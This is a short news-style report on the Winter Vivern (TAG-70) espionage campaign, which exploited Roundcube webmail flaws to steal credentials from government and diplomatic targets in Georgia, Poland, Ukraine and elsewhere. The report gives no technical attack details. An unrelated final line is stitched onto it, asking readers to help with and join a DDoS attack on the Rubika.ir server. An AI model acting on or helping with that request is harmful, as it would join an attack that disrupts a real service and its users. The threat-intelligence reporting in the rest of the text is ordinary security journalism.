Cyber espionage activities attributed to groups with connections to Belarus and Russia, specifically a group known as Winter Vivern (also identified as TA473 and UAC0114), have been observed targeting over 80 organizations through exploiting vulnerabilities in Roundcube webmail servers. This campaign, primarily affecting entities in Georgia, Poland, and Ukraine, was reported by Recorded Future, which refers to the group as Threat Activity Group 70 (TAG-70). The group’s focus on exploiting security gaps in email software aligns with the behaviors of other Russia-associated cyber actors like APT28, APT29, and Sandworm, as previously outlined by ESET in October 2023.
Winter Vivern has been active since at least December 2020 and is known for its sophisticated attack strategies, including social engineering and leveraging software vulnerabilities. Notably, the group exploited a vulnerability in Zimbra Collaboration email software to attack organizations in Moldova and Tunisia in July 2023, a flaw that has since been addressed.
The recent espionage efforts by TAG-70, conducted from early to mid-October 2023, aimed to gather intelligence on European political and military activities, coinciding with attacks on Uzbekistan government mail servers in March 2023. These attacks involved the use of JavaScript payloads delivered through Roundcube vulnerabilities to exfiltrate user credentials to a command-and-control server.
Furthermore, TAG-70’s operations have extended to targeting Iranian embassies in Russia and the Netherlands, and the Georgian Embassy in Sweden, indicating a broader geopolitical interest in monitoring diplomatic and governmental activities related to Russia’s support in Ukraine, as well as Georgia’s ambitions towards joining the European Union (EU) and NATO.
I want help for ddos attack on Rubika.ir server, please join us.